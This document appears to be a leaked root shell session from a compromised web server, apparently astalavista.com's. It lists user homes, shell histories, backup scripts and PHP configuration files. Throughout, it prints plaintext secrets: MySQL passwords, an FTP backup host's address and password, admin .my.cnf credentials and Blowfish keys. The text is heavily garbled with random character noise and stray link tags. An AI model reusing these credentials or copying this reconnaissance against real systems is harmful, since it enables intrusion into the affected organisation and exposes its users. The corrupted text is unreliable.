# | | ___] | | | |___ | | \/ | ___] | | | #
9 I+ w' ~% R/ x7 O* ~# #$ y! O, M u5 R% Y" N7 z
#####################################################
, n M2 F, C6 Q* w) Q- J# #
, U v. X& V" d% N# Admin Contact - 链接标记support@secureservertech.com #$ }; p( A; R) @- M7 W* g8 ~4 v
# # a7 v% C& a+ i1 h- b# U8 C3 _
# Available ShortCuts #% O$ ~9 c: _+ \ l9 r: E) d
# #. E9 d. @, c8 K+ v$ i
# nst - list active connections #' T p- U' x+ G0 o- u( B
# ddos - shows how many times each ip is connected #+ o8 J. U/ I, f/ s: o
# ltr - restart the webserver #4 b, {9 c6 c1 Q0 Q4 p. r* w9 W) W
# phpc - edit the php config file #& H9 `2 D# }1 x$ @- V8 M
# htc - edit the webserver configuration file #
- |6 o. e w6 W, x0 u$ g# up - uptime #
# A3 T0 Z( D E" b8 o7 ?/ Q# etd - edit the motd of the day file #
6 K4 T9 e7 Z# K$ x# htr - start and restart apache if needed #: j7 Q" F: W) F+ p2 |
# syng - shows active SYN_RECV connections #
4 D7 C& F3 k. J. O4 Z; `, z# synd - syn flood blocker - “synd -h” for usage #% h1 ^$ p2 N% n, [/ ?
#####################################################
" p( A' \4 M+ `- B$ Y# NOTES: #
9 Y I5 |- e9 m! N+ N# n# Last Upgrade - 12-08-2008 by JF #) ]( a5 ]% g0 v- Q
# My.cnf/Mysql Optimization - 1-28-09 #
0 z- V: `( X6 t$ S7 C7 N8 F# #
0 P8 P4 N; n+ R# #
2 O1 p# h2 t) }" s3 b( [- A8 z$ M# #
2 g. M, h1 F: W#####################################################
% }; b; L, t- h& {8 }8 \% {0 }, }6 o$ ?2 L
sh-3.2# lastlog | grep -v Never
4 U y5 }$ d" t6 eUsername Port From Latest2 U' B O+ a* \0 W; B" u* e$ u2 t
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
6 \, _0 i9 T0 z1 I8 j* x+ t. Eadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
8 h6 W9 D3 H! G6 q& ]com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20096 t2 H$ Q d. x- _: ~, ?
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20094 j. n2 @/ K# C: e* n% n
4 e% v& H# A! R2 u% ^- H
sh-3.2# ls -la
# \" @& y9 m8 `' k, Etotal 453376
9 p& P" G+ c0 d z( e# T1 Bdrwxr-x— 15 root root 4096 Jun 4 08:40 .' V. X0 w+ M- @, D- s4 o/ L2 T: J
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..7 |8 y8 ]5 M; m
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
- H6 o% s4 G Y( G. O-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg9 E4 p9 m# ?" }+ p2 ~% m; ?1 L
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history! o9 n5 P8 y6 N! c/ X( f! J7 i
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout7 a7 L+ B( [/ L+ K' M/ {$ F
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
, I' s: @" c! L-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc4 t- N; K1 B/ [* l- n
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh1 O# n5 @2 \" F( z
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
4 Z9 x& S4 S+ r-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql! Z9 J8 b. O& k# ?
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
' _1 }: D; l0 b- R( s. g-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc: ?& @5 e" U: _6 |+ E8 P
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
( m5 e8 O x# ^2 E1 o9 Qdrwx—— 2 root root 4096 Oct 28 2007 .elinks
, \# \0 }, f( s3 U2 jdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1& i) {0 Q9 O" ]3 L' M! n
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2* c: D' m. u; n- G5 M, ?+ c
-rw——- 1 root root 0 Apr 16 13:19 .history
3 s) }7 K9 G- V% U9 v0 N-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
# l9 C y7 n; u2 h8 e" Q, R-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
# F, C1 L! l; m+ r+ _* t% I-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh" g3 W& Z1 Y# _8 |* ?/ F+ \+ d
-rw——- 1 root root 35 Jun 2 14:23 .lesshst" Q( ~; a8 c. ?1 G- J; H
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
* {/ R7 i: }2 A& X3 {, Pdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec/ P( i) m7 z; d1 L: ~$ p
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
0 G& e7 o# R8 J/ H M* R-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
/ b) M5 d0 C. ?* B- a-rwx—— 1 root root 760 Sep 18 2008 lp
v' g, W0 d, |" A; U6 P) ]6 q, ddrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
% a! _7 T2 u; a% J* i# o' T% x0 x-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
! _ H# @0 W+ O8 [$ J$ R-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1# d7 R) r4 u! q& D' K1 s
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.97 V3 p9 {! }- x! r: N- `/ a5 G0 E
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz0 b$ @/ \7 {& Y) X3 F$ g
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
8 K4 t$ |8 X. a7 X; @' G( K-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
9 x( E4 N6 E8 Z" t. W-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
2 z( n/ l/ y, t* g6 ~) o2 J-rw——- 1 root root 41 Oct 19 2007 .my.cnf
9 k6 K( X: C2 y( a8 U% M3 |% O-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
& I0 D: a' {8 J/ V+ X-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
1 p- p* Q' T- g+ N* w3 J-rw——- 1 root root 41 May 20 2008 .mytop5 n" F: V/ t( p" L5 j
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6! C. K @$ f6 X: K0 \3 k. t, @, o
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz' ]2 u# ]6 f) Z. y: @4 j, ^
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
7 J& x* G- e4 ~% H$ j/ t9 A& r-rw——- 1 root root 1462 Sep 21 2007 opt.php
6 _4 j) M& I! a: G" _-rw-r–r– 1 root root 3371 Sep 22 2007 p+ J, u. ~" P" V" n$ @( C e
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
8 n3 G; C' c$ _3 H9 t2 B+ ?8 O-rw——- 1 root root 1024 Feb 3 21:32 .rnd# A+ C, W( `8 I+ Y
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr3 ^4 e6 O: j) `5 z
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
* D; o9 @% M. v$ Kdrwx—— 2 root root 4096 Oct 10 2008 .ssh0 c: [; B( _& Q, {# k
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
3 a8 l. x. ]+ }+ K# l-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc$ {9 l) r2 ^2 q. @0 o
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip- o: e4 h3 i/ s
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1/ y! s, w2 V# k* c- k q m
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
r0 ]' `2 `2 v3 i-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
5 S/ v. W( R: A' Hdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0" r2 D! g% I+ Y
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
0 |0 m5 ?. M, |( ^6 w' d) z/ Q) B' I-rw——- 1 root root 12997 May 16 2008 .viminfo. d. m9 ?9 C7 G6 x& A$ M! n0 S7 ^( x
( D' y$ Z- k# T2 w0 o$ }sh-3.2# cat .bash_history' E, @% t! m1 [3 M; ?' q
[snip]: I( Q- C9 d8 A5 ?7 u
wget cp4sst.com/sstlinux.tar.gz! M' t. L2 u5 X3 L8 a/ L
tar zxvf sstlinux.tar.gz
6 S8 D, f4 W5 G! F' {cd linux-2.6.27.101 W8 v4 v& } O# c
sh install.sh
; ^- j4 ~4 ]. C) U; L0 T% I8 ]make bzImage ; make modules ; make modules_install ; make install
: G& r. I$ h$ j5 @& \ hmake clean _3 o W, F0 t8 S! e/ D
service mysqld restart
# g" @; [" \3 E; F8 h- P[snip]
: V/ j- T% ]4 r. J/ [0 q4 pcd /usr/sbin/( i, h! s9 w) l; N; O7 h
chmod 4777 traceroute3 |8 v3 a" r! ^' e+ X
chmod 4777 ping+ y7 q) |; s4 W7 V6 J& _
traceroute -I 链接标记[url]www.astalavista.ch[/url]
# Y0 Q+ ]: ^- J9 R[snip]
/ \8 A: ?$ r. G) T- X! |vi /etc/csf/csf.conf; G+ b, A) @/ d! f& O9 L. N
traceroute google.ch1 s6 z3 [ p1 _( v5 e
service csf restart6 e! |9 k" E& B$ N" `( d
tracert google.ch
' `5 m+ C: t1 o2 ]/ u! B9 B& U& Qservice csf restart9 p4 Q" N. U. F. k) O
traceroute 链接标记[url]www.google.ch[/url]
- _) |; u. c$ `# utracert 链接标记[url]www.google.ch[/url]& ]7 X% m2 ~* j* j7 |8 ` c
traceroute 链接标记[url]www.google.ch[/url]
# m5 j/ E% L# w$ C; D nlocate traceroute
$ C5 N+ g0 s$ @6 M+ V& C1 [$ H5 Ichown 4755 /bin/traceroute
* l5 \" v1 S: i- k: W; m: f# zchown 4777 /bin/traceroute W, t# t2 n* J" R4 p
locate ping$ a3 `7 N; }' }7 G: t' p
chown 4755 /bin/ping
! z0 T! A. j! y* e" c6 Mchown 4777 /bin/ping
2 p( _0 P. h" J2 N% J q8 a6 mcd /bin/! R, F- q. J$ u2 W- a3 m) v! i
ls -ali | grep ping/ N$ f0 o3 k% y/ O$ ^2 p3 ]! c
chown root ping$ z8 X' R3 I3 x M1 H+ G7 q
chmod 4755 ping
8 J% \" q2 e: z9 m: R5 f& els -ali | grep traceroute# g, g# U5 m/ S. o9 x3 P- T+ M2 z
chown root traceroute" K& ~9 j+ U' S/ t& q( }9 j
chmod 4755 traceroute
: }7 ]7 L7 `7 F3 o5 G) C/ Als -ali | grep traceroute
% t! N& M, o) T! E5 straceroute -I 链接标记[url]www.google.ch[/url] Z- [; f9 b; m, z c% ~
traceroute 链接标记[url]www.google.ch[/url]
1 F0 l2 }/ [+ x+ m7 L: [3 l" [" ]' dwhois pmsantos.ch7 l) L6 `% M6 Z$ l! q. `7 w
[snip]- V! ~# U9 t$ i" f& U
mysql -h com_contrexx2_live < /root/defaultp_ports.sql$ \% @4 T8 [+ U
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql% z6 g5 Z: I5 ?! D# T4 K& p5 R
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql4 C: S; p7 @ s; c2 G
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
5 y1 [) b9 [ T/ D N8 z# @9 Btop
4 h4 N2 x+ {( b) h& wping ssth.ch* O7 V0 i7 @; Q1 v
ping asdlkfaljgasd???ljg???lasj.ch
4 ?/ ` t' S1 |# gping asdlkfaljgasdlasj.ch; g# T0 C) t" J& P2 B1 `6 ~; D+ ~
ping 链接标记[url]www.ssth.ch[/url]
4 h5 z" ~4 h8 g( hping ssth.ch$ U5 z8 n( v' E+ v6 b& _5 d; K
nslookup 链接标记[url]www.google.ch[/url]
, K; C1 @( C5 r: W2 a3 ^nslookup 链接标记[url]www.ssth.ch[/url]- ~! [3 K4 k! D
man nslookup8 E( ~/ L6 E+ t
ping 链接标记[url]www.google.ch[/url]
- d4 H1 R3 Q% H+ Z1 j/ T/ k/ ^nslookup 链接标记[url]www.google.ch[/url]) U/ k6 X* j7 m, a. a7 Y4 o; d
nslookup 链接标记[url]www.google.ch[/url]
3 g# g) z3 A) a" \+ ynslookup salfjasdlf.ch
0 a) o/ ] s; ~[snip]
- y( s) T8 c" Q% X+ Zopenssl passwd -1 sadf9 V% O+ T2 P5 i+ H! d
openssl passwd -1 5cZNHstdTy
+ f2 F9 i/ f O/ u7 ^mysql
- N2 f. o1 y9 F# t2 j$ {9 Pmysql
" t& D& i& \) M e' Hlocate proftp
, T B2 D( C2 u* x" Kvi /etc/proftpd.passwd, x# D* _# i& K2 E* |
service proftpd restart- H* |' O& F$ H' T' R* _) y4 R9 O
locate proftpd.conf
8 C1 |9 o" n4 Q% x9 ?6 U$ |vi /etc/proftpd.conf7 V4 \1 S7 U/ r' q8 m1 s- m* m
vi /etc/proftpd.passwd, C! v9 B. W, o0 @! G3 _/ d. b o8 y
service proftpd restart. Y, W. \3 g$ n+ q/ \& f) j; v: |
[snip]
0 F& S% L$ C# b3 u5 |/bin/sh /home/com/backup_system/backup.sh3 S/ z9 S1 F, d; S
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin0 E" T8 ^8 r6 C( k A/ d! s
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql: L8 K0 n3 m# [/ l3 |+ ?4 i* m& R
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
9 e% f8 G+ y% ~# Sls -ali: S% W- x0 k+ V) ^' H+ t& b' S& S
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql. Y$ q/ o4 L& ~
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
f' T+ b4 c4 [( O& Ccrontab -l
2 ]8 m' s. n7 c& A' R, o# acrontab -l
( N I" G. F9 r5 W y8 g( Gphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
1 l+ D+ I j1 u9 w! O/home/com/public_html/modifications/cronjobs/exploits.sh
4 E2 Y. X. R) ]6 ^. Twget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]$ b" f' W$ w# e3 ]; z6 d
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz0 o0 X+ k3 `8 P! }
cd lsws-4.0.3
: T. {4 O$ P, Y9 X) o- Esh install.sh
8 r# |0 G6 ^0 Q. z- `8 \0 zuptime
: l# q% _+ O: O/ i; U' `hdparm -tt /dev/sda
9 q6 q% M' v$ d( e" Z5 liostat
: G3 J$ s6 [% v) {6 f2 jyum install iostat7 A+ A# x& V$ r/ ^* q- v4 s T \; {
iostat; G" T& n5 R: G- B. r! J2 x
whereis iostat
5 ~' R& ^) t: O: B7 X5 iyjm clean all0 i. F* I- L0 G" j+ n
yum clean all ; yum -y update
/ k$ Q2 c. v& [1 \0 tiostat3 A6 F9 _$ z/ \8 u% L+ C. l7 M
yum install systat
/ ?9 G+ \* z! erpm -qa | grep iostat8 L+ p6 [; z" _6 m! P% n
rpm -qa | grep sysstat
# ?" Y1 S: N1 e) D: p4 `! _- rrpm -qa | grep systat' `0 w* N- M. b& Z1 B$ s
dmesg -c
' {$ v* N# P% B; t1 s* ksysctl -p
& X) K# Z+ P' y' Puname -r# V% v0 O/ f w' X( s
cd /usr/src4 ]3 }6 Y! N6 l0 j; @
wget nix101.com/kernels/sstlinux.tar.gz
9 l3 U( X- S8 o0 Oshutdown -r now
: S0 V: |$ ~( c6 Fnano -w /boot/grub/grub.conf# p) B7 b2 C' B& N
8 v( O9 U, t; h( u: \& l( E1 c% Lsh-3.2# cat .my.cnf0 _2 ~- F$ w! ^8 X# A& S7 L$ T
[client]
) f& E2 e1 `. X) ouser=da_admin
5 E1 v) P' c" q$ I& p$ [password=X9dctmRH
: t7 k9 |6 {: j, T# a4 q* I. n
# S" s. r+ r( B; s* ]# {sh-3.2# cat /home/com/backup_system/backup.sh" w2 Y" p5 D" x
#!/bin/sh" V- Y% k, f6 V5 D+ ?
#####################################################################
- V, R l- s. w# R7 ^0 v1 } k# # Z, J8 [9 w' _4 t& U* C8 |8 T8 k
# incremental backup for astalavista.com #' w0 [5 ?' q: M8 o
# #+ d" r5 E( S, }7 Z" s* W% ~7 o; h
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
o5 h. E! ?8 B" Z# #. q" Y7 g7 o9 T4 T8 u
#####################################################################% i: y& \- g4 z
[snip]3 u9 C* |& G; P! [$ j
PROG_DIR=”/home/com/backup_system”;
" Z4 I5 Y$ H* A% PBACKUP_DIR=”/home/com/backups”;
9 q5 K$ R* h3 }# l0 J: B, K% F5 rDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
' X" |5 t o I3 Y# ftp for synology backup server
* _; ~$ x% X9 U) tFTP_HOST=”212.254.194.163″;7 q8 u+ x" u/ u" U+ Z/ n, E
FTP_PORT=”21″;
0 v+ t# r( ~- M, h( }, FFTP_USER=”astalavista.com”;
$ ^! c' u2 i# @FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;/ M$ I) h; D3 r% A1 Q! X
FTP_DIR=”/astalavista.com”;
" ]% e7 s. U) z* k4 [0 p0 f& m# database
1 _* h) B) ^, d& S5 gDB_HOST=”localhost”;3 \5 ]$ z% ~4 n; R8 R9 [: K3 G
DB_USER=”contrexxuser2″; t0 ^& ^0 J. s: |) g
DB_PASS=”0fEYNZgXz1pKe”;. \, h8 G4 Y/ z, O0 E, ?! W; n y
DB_DATABASE1=”com_contrexx2_live”;: V2 Y3 a' Q j# _" \, r% T {
DB_DATABASE2=”com_contrexx2″;3 _- h9 ~4 s" k, Z
[snip]
* B) c/ O4 b h+ j4 l$ L. m. lftp -in $FTP_HOST $FTP_PORT <<EOF
; j4 R% P5 T$ u& ^quote USER $FTP_USER3 I% [8 v1 \- h7 |9 b
quote PASS $FTP_PASS
1 K% [' O3 {6 o% U$ G' j1 A8 Wcd $FTP_DIR
5 O) b3 U* y9 X7 `& z& Aput $DB_FULLNAME-SQL_Dump.tar9 h* M0 Q4 o8 S% H
put $BACKUP_FULLNAME-Public_HTML.tar
. y! ^+ u9 B0 F1 u: j' Sclose
8 o- }# ~! M8 N/ xbye
! V+ q3 b2 F8 I% G4 a9 E+ Y$ HEOF* i7 R- Y; S% ^7 J. R0 C
+ U- }* F7 q6 {2 O
sh-3.2# cd /home: R* ]' D$ c9 T- S+ d
sh-3.2# ls -la
0 [+ w$ w8 q. k0 K4 Gtotal 1207 [1 B1 o- L2 ?
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
) X- e( ?: s7 D# z; o) }drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..7 {2 v% h1 Y* Y( \ K9 @# v, k4 @' J* @
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
! H1 L% g! l; W/ p/ [% z( r-rw——- 1 root root 8192 Jun 4 03:03 aquota.group9 \7 x2 v K- t) ~; P( x
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
( I7 T* j5 T( R4 S& ]' C+ m) Cdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
( S* K" y: B( W6 \drwxr-xr-x 2 root root 4096 Jul 29 2008 backup0 M4 ^5 } W* G7 @/ _
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141618 E8 Z; k$ R' _0 z$ P6 y$ |
drwx–x–x 10 com com 4096 Apr 28 12:40 com
# j, x6 C$ |- E x( ^drwxr-xr-x 2 root root 4096 May 17 2007 ftp" ]; ^, }4 f( Y9 T; G
drwx—— 3 jon jon 4096 Sep 21 2007 jon
: ]9 y: h" t) r9 j5 h! ndrwx—— 2 root root 16384 Sep 11 2007 lost+found
. b* y. V4 b+ d @* d1 `% sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
) P' o) _6 A6 F( I# k& Adrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata' _/ V- [9 w+ R: |! S5 [) J
drwx—— 2 jon jon 4096 Sep 15 2007 test! \7 l7 t0 k# {; n
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp* Z5 ]: e* x, N* O. j
% Z: L) }4 Y+ w8 [sh-3.2# cd admin( x2 n, D0 g a
sh-3.2# ls -la
# f& z& s! F Z; i- Y) v# G: ototal 1735896
( o J( g2 Q5 I/ Vdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
# _/ z. t! f# pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ E) f" v6 X2 K# R- Hdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups& c& P9 g* L" g1 j3 _! }
drwx—— 2 admin admin 4096 Sep 28 2007 backups! B) A2 S4 K& M6 |! }
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
! f/ X/ h1 ~' X% V: v-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
+ J2 s6 K" v, _6 U" F4 N-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile! S% J W3 X, ^1 m& \; E& F E( C
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
: |9 j J3 p2 i7 }; t, \drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups3 ?) ?9 f2 d: s G
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains" Y; X. p: v9 b. |6 c" P1 p
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
: R$ Q+ m( s% ?4 y% E: t/ ]-rw-r–r– 1 root root 24 Sep 21 2007 info.php5 Z" _, ] E' _9 i
drwx—— 2 admin admin 4096 Sep 21 2007 mail
$ Y- A6 w, v H) j-rw-r–r– 1 root root 716 Nov 28 2007 server.csr& ?3 w( {" M. X5 t6 y0 u5 G3 \$ S
-rw-r–r– 1 root root 887 Nov 28 2007 server.key5 @: o b* A) u" \
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow+ s( f8 E2 x4 z& j
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
' j3 u3 A" Q1 S3 ]; s8 _drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups% x/ Z5 C$ @4 E* b2 i
( ?# ]3 j4 b0 ]+ k/ n7 T( K1 \- ?
sh-3.2# ..
0 C4 K" c" u" F9 h; W/ y% K+ |sh-3.2# cd jon
% Z, n- Z) F3 z R; Ish-3.2# ls -la
2 L) m, n7 f. b1 O! K, utotal 36
* M9 a7 f* c2 F3 F! Wdrwx—— 3 jon jon 4096 Sep 21 2007 .
( Q Y( z" P6 R. kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: k6 S4 O$ Z* h* w8 Q# `- o9 |' O-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
% D" k# w$ p1 u-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout8 N2 L8 U# W: y; ~) `) W; I
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
$ t. g- F" E2 m P-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc3 L. ]4 T" N0 s. R6 G
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
: x+ \0 o) E4 T7 wdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html4 S6 [" S d( E2 `
# J: L8 g, r% n. w. Z) dsh-3.2# cd ..
1 l+ m0 H) n- W" z6 K2 Ush-3.2# cd test
( c& P& m1 N9 s1 R9 d0 X) \sh-3.2# ls -la
- \1 `; m O5 S0 P' W. _) s4 ]total 48 t2 Y2 y+ q- G, P
drwx—— 2 jon jon 4096 Sep 15 2007 .
8 b+ c8 S: p4 P* `drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 ?. r0 ^( F7 x
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
; a% m. \0 p7 U1 { t-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout+ {4 L/ o& j9 J' C
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile( r9 y F5 @" n2 h1 L
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
- G/ t8 |& X2 {0 @0 ^4 ash-3.2# cat .bash_history3 ]: i* T8 p' F: b% @& d) B7 G6 z
/usr/bin/mysqladmin -u root password PoliuJhytg67
+ e' m% d1 H. l2 ?7 ~5 h) E
0 c. Y) }, w B; f1 ush-3.2# cd ..
7 v+ b4 f+ i2 d) Ksh-3.2# cd astanet
6 B1 H, E- @8 ]8 `sh-3.2# ls -la
0 X+ J& G* e' \9 L9 Mtotal 52( q: T2 @: L6 ~4 V. ~
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
! k, r$ s9 h& ^: z( xdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
( N4 d5 p5 l7 @$ d1 y$ ]$ Cdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
0 p& [4 c6 k r$ {-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history! |3 B9 ]$ a( L A+ O$ y E9 j
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
5 H" W7 s! X6 c; l% _0 \1 h% O% {; U% D-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
( @3 Z1 M! @% i i# X# s) c-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
' J! b! h+ [0 @; S7 h- Xdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains/ n' f2 t s& t5 ~' l
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
5 v+ I7 M6 s5 W/ Q/ U2 V, Ddrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail* g5 B5 T v: ?* I# J; r2 @; t/ _
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
/ n" E' u; M( a ?lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
9 Q$ {" T. W, r L, I+ q-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow, P) z* M. l7 Z. g6 d2 B
/ e! J$ i0 L2 L' p9 H4 W( @' o
sh-3.2# cd auth/1 L- {8 T! C2 |, j2 [" d- L* l% s
sh-3.2# ls -la
2 Z0 t5 y: m( y/ M/ E. s' _total 28& E" [( ?/ q# c7 z$ @$ s
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
. c- Q7 l* `& s6 ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
4 x1 \. k% _& @7 _-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php7 H' y0 E) ?; w$ m L8 w* Q
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
/ _% k' O9 Y }1 s7 v0 R-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd$ V, N6 k6 k6 E- p3 E: M+ F
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
" E* B2 B: C K0 a; S-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
. T: `3 @3 E" T
& E$ n$ H: }' M3 Z3 i6 ksh-3.2# cat hackercontest.config.inc.php
) a" o0 T8 \8 m+ g( s Y<?PHP
' \' ]# P8 \1 ^% O' y4 K+ C// Variabeln f?r Verbindung zur Datenbank //2 s4 A, W, c0 ] ~
$conxHost = ‘localhost’; // MySQL hostname
+ ~! J: _; w9 m, F, d$conxUser = ‘hackercontest’; // MySQL user
& M5 i' f) K3 c3 R @$conxPassword = ‘K6m@7dUc’; // MySQL password
6 X4 @( q) C2 z$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish# {' E& {5 G2 q2 q
?>
Z* V5 |1 U1 E2 ^# q7 Z/ ush-3.2# cat hosting.config.inc.php
7 t6 W0 w2 u7 b! Y6 m& V<?PHP# F6 o6 E: x* U f0 n5 d: M" F
// Variabeln f?r Verbindung zur Datenbank //
# ~3 \5 V9 T; X1 J6 k$conxHost = ‘localhost’; // MySQL hostname: i9 B/ m! g$ J) `' u! L0 ]' i* L
$conxUser = ‘hostinguser’; // MySQL user
# \6 r8 w& {7 W# k/ R% B$conxPassword = ‘cXvB3981′; // MySQL password
0 u8 n$ y8 N4 ]$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
- M) P4 F6 C' I9 a6 s4 G?>8 O( f: L7 z& I `: {
) J. R) Z# C- [- u' }. E, j
sh-3.2# cd ..
/ _# T& H: g( A3 ush-3.2# cd com$ O" v3 n2 W! t, R9 p) w
sh-3.2# ls -la
7 J' ~" E6 g! Z8 d4 i- ~6 ztotal 141208' m8 V* o( b. R$ o4 @! T
drwx–x–x 10 com com 4096 Apr 28 12:40 .) e4 Y; Z5 b+ I7 e$ K& Y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
